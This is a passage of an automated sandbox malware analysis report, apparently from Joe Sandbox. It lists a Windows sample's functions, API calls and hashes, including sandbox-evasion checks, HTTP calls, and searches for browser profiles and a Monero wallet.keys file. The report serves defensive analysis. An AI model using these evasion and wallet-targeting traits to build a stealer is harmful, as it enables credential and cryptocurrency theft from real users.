                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                    • String ID: @
                    • API String ID: 3404098578-2766056989
                    • Opcode ID: c31e00f296cf2d401d5a41a2ba55288bee3dc93a0eb14f9cc1c2c1ac7344fdb7
                    • Instruction ID: c23ab2d808566809ca7d92aef62718bc09f2aec2469a4f98cf831cef39851898
                    • Opcode Fuzzy Hash: c31e00f296cf2d401d5a41a2ba55288bee3dc93a0eb14f9cc1c2c1ac7344fdb7
                    • Instruction Fuzzy Hash: 4A014FB0940308AAEB10EFD4CC49FADB7B8AB05701F248499E705BA281D67455458799
                    Function 00BD6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1450 bd6af3 1451 bd6b0a 1450->1451 1453 bd6b0c-bd6b22 call bd6920 call bd5b10 CloseHandle ExitProcess 1451->1453 1454 bd6aba-bd6ad7 call bdaad0 OpenEventA 1451->1454 1459 bd6ad9-bd6af1 call bdaad0 CreateEventA 1454->1459 1460 bd6af5-bd6b04 CloseHandle Sleep 1454->1460 1459->1453 1460->1451
                    APIs
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013C8F18,?,00BE110C,?,00000000,?,00BE1110,?,00000000,00BE0AEF), ref: 00BD6ACA
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BD6AE8
                    • CloseHandle.KERNEL32(00000000), ref: 00BD6AF9
                    • Sleep.KERNEL32(00001770), ref: 00BD6B04
                    • CloseHandle.KERNEL32(?,00000000,?,013C8F18,?,00BE110C,?,00000000,?,00BE1110,?,00000000,00BE0AEF), ref: 00BD6B1A
                    • ExitProcess.KERNEL32 ref: 00BD6B22
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                    • String ID:
                    • API String ID: 941982115-0
                    • Opcode ID: 6c5f86b30a82e76cc8359ad0d931f94a97c0be1aab24bc5cb8bddd322e01b784
                    • Instruction ID: 3e9cae4096ed91729a99bdd7a214aff9d2df0b223d334994e4788e689bd18a75
                    • Opcode Fuzzy Hash: 6c5f86b30a82e76cc8359ad0d931f94a97c0be1aab24bc5cb8bddd322e01b784
                    • Instruction Fuzzy Hash: 0EF05E3094031DAFEB10ABA0DC4ABBDFBB4EB04701F1485A7F502B12C1FBB15584D666
                    Function 00BC47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BC4839
                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00BC4849
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CrackInternetlstrlen
                    • String ID: <
                    • API String ID: 1274457161-4251816714
                    • Opcode ID: 11b9ed65820bc1b8ff95fb03bd1ca6311a4b3f795c92fd61542477401d6e7072
                    • Instruction ID: 4007ab9d7b36ad027c293f8d2fe341dd1c98c3f3b6077033ff76fcefb1c1b953
                    • Opcode Fuzzy Hash: 11b9ed65820bc1b8ff95fb03bd1ca6311a4b3f795c92fd61542477401d6e7072
                    • Instruction Fuzzy Hash: 15213EB1D00209ABDF14DFA4E845ADEBB75FB45320F148626F919B7281EB706A09CB81
                    Function 00BD51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                      • Part of subcall function 00BC6280: InternetOpenA.WININET(00BE0DFE,00000001,00000000,00000000,00000000), ref: 00BC62E1
                      • Part of subcall function 00BC6280: StrCmpCA.SHLWAPI(?,013CEA08), ref: 00BC6303
                      • Part of subcall function 00BC6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BC6335
                      • Part of subcall function 00BC6280: HttpOpenRequestA.WININET(00000000,GET,?,013CDFD8,00000000,00000000,00400100,00000000), ref: 00BC6385
                      • Part of subcall function 00BC6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BC63BF
                      • Part of subcall function 00BC6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BC63D1
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BD5228
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                    • String ID: ERROR$ERROR
                    • API String ID: 3287882509-2579291623
                    • Opcode ID: 34d881ca648f76b85ecacf2dd8798ef38151e29e6ab1434698f25b40448d6000
                    • Instruction ID: bf1f397b3ebe5fac10014336a49afc88a082dea2c68acd287c3f66cc8b2f08a8
                    • Opcode Fuzzy Hash: 34d881ca648f76b85ecacf2dd8798ef38151e29e6ab1434698f25b40448d6000
                    • Instruction Fuzzy Hash: ED110030910148ABCB14FF64DD92EEDB3B8AF50300F9045E9F81A5A692FF71AB09D695
                    Function 00BC1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BC112B
                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00BC1132
                    • ExitProcess.KERNEL32 ref: 00BC1143
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$AllocCurrentExitNumaVirtual
                    • String ID:
                    • API String ID: 1103761159-0
                    • Opcode ID: cad329dd4d218c8fc5cce0e71df3ffe7aa4ee5500b541b1750e2f80be8766fa3
                    • Instruction ID: 221d1bdbd6de6f9f22af6cde873b392cb4a76c78ba3981bef72262b1791d1e71
                    • Opcode Fuzzy Hash: cad329dd4d218c8fc5cce0e71df3ffe7aa4ee5500b541b1750e2f80be8766fa3
                    • Instruction Fuzzy Hash: 7CE08670A4530CFFE7106BA59C0EF0876B8EB04B01F144094F708761C1C6B526449699
                    Function 00BC10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00BC10B3
                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00BC10F7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Virtual$AllocFree
                    • String ID:
                    • API String ID: 2087232378-0
                    • Opcode ID: 2db1cb8e4ce9123687c29130bcbeb610f7ba281332e25d94372e4b454098edf4
                    • Instruction ID: f19a4c03489d97793556bb994a1307da4e7d1d786e922e0e3a3ba8c148d57e81
                    • Opcode Fuzzy Hash: 2db1cb8e4ce9123687c29130bcbeb610f7ba281332e25d94372e4b454098edf4
                    • Instruction Fuzzy Hash: 69F05271640308BBE7049AA8AC59FAAB3E8E305B11F301888F500F3280D5329E40CAA1
                    Function 00BC1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BD78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BD7910
                      • Part of subcall function 00BD78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00BD7917
                      • Part of subcall function 00BD78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00BD792F
                      • Part of subcall function 00BD7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BC11B7), ref: 00BD7880
                      • Part of subcall function 00BD7850: RtlAllocateHeap.NTDLL(00000000), ref: 00BD7887
                      • Part of subcall function 00BD7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BD789F
                    • ExitProcess.KERNEL32 ref: 00BC11C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                    • String ID:
                    • API String ID: 3550813701-0
                    • Opcode ID: 8b81f11bdd134a86806c2f7160ab577535806496608ade734376b4a1a0c65519
                    • Instruction ID: 04f2f5291b7fbfdab81eea049d1c8fc9455b43578557fa3229cb32ffb4cd223b
                    • Opcode Fuzzy Hash: 8b81f11bdd134a86806c2f7160ab577535806496608ade734376b4a1a0c65519
                    • Instruction Fuzzy Hash: CBE0ECA595430556CA0073BAAC0AB2A76DC9B1534AF0C08AAFA05B2243FE2BE8448566

                    Non-executed Functions

                    Function 00BD38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                    Download Yara Rule
                    APIs
                    • wsprintfA.USER32 ref: 00BD38CC
                    • FindFirstFileA.KERNEL32(?,?), ref: 00BD38E3
                    • lstrcat.KERNEL32(?,?), ref: 00BD3935
                    • StrCmpCA.SHLWAPI(?,00BE0F70), ref: 00BD3947
                    • StrCmpCA.SHLWAPI(?,00BE0F74), ref: 00BD395D
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BD3C67
                    • FindClose.KERNEL32(000000FF), ref: 00BD3C7C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                    • API String ID: 1125553467-2524465048
                    • Opcode ID: b5389fb86154d012d5e60e35aa188a9f7aba73547bcf438cf011e3953d147f08
                    • Instruction ID: e53de401e3259d7a43e6a5d29770402c565776a59ebddaff84e73be42a9d36db
                    • Opcode Fuzzy Hash: b5389fb86154d012d5e60e35aa188a9f7aba73547bcf438cf011e3953d147f08
                    • Instruction Fuzzy Hash: D8A12171A103189FDB24EB65DC85FEE73B8FB44700F0845D9A509A6141EB759B88CFA2
                    Function 00BCBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                    • FindFirstFileA.KERNEL32(00000000,?,00BE0B32,00BE0B2B,00000000,?,?,?,00BE13F4,00BE0B2A), ref: 00BCBEF5
                    • StrCmpCA.SHLWAPI(?,00BE13F8), ref: 00BCBF4D
                    • StrCmpCA.SHLWAPI(?,00BE13FC), ref: 00BCBF63
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BCC7BF
                    • FindClose.KERNEL32(000000FF), ref: 00BCC7D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                    • API String ID: 3334442632-726946144
                    • Opcode ID: 42b117eda1e5ac73de6afdcd759664883b1a220039a5b63c83e06f0b3e4fa1a1
                    • Instruction ID: 8c7fffa5c474cd22252f7acb3b251188debee5007af8462f720c75ec8ef63ae5
                    • Opcode Fuzzy Hash: 42b117eda1e5ac73de6afdcd759664883b1a220039a5b63c83e06f0b3e4fa1a1
                    • Instruction Fuzzy Hash: F44243729101089BCB14FB70DC96EEDB3BCAB54300F4045E9F90AA6291FE359F49CB96
                    Function 00BD4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                    Download Yara Rule
                    APIs
                    • wsprintfA.USER32 ref: 00BD492C
                    • FindFirstFileA.KERNEL32(?,?), ref: 00BD4943
                    • StrCmpCA.SHLWAPI(?,00BE0FDC), ref: 00BD4971
                    • StrCmpCA.SHLWAPI(?,00BE0FE0), ref: 00BD4987
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BD4B7D
                    • FindClose.KERNEL32(000000FF), ref: 00BD4B92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\%s$%s\%s$%s\*
                    • API String ID: 180737720-445461498
                    • Opcode ID: e4f54af50c9d9357a074d626f89c35ac5805bcc69167709a393652a57e4d1b75
                    • Instruction ID: fbbf502be47c641775942f46d4c942665005651155169f2574432d67f75637e0
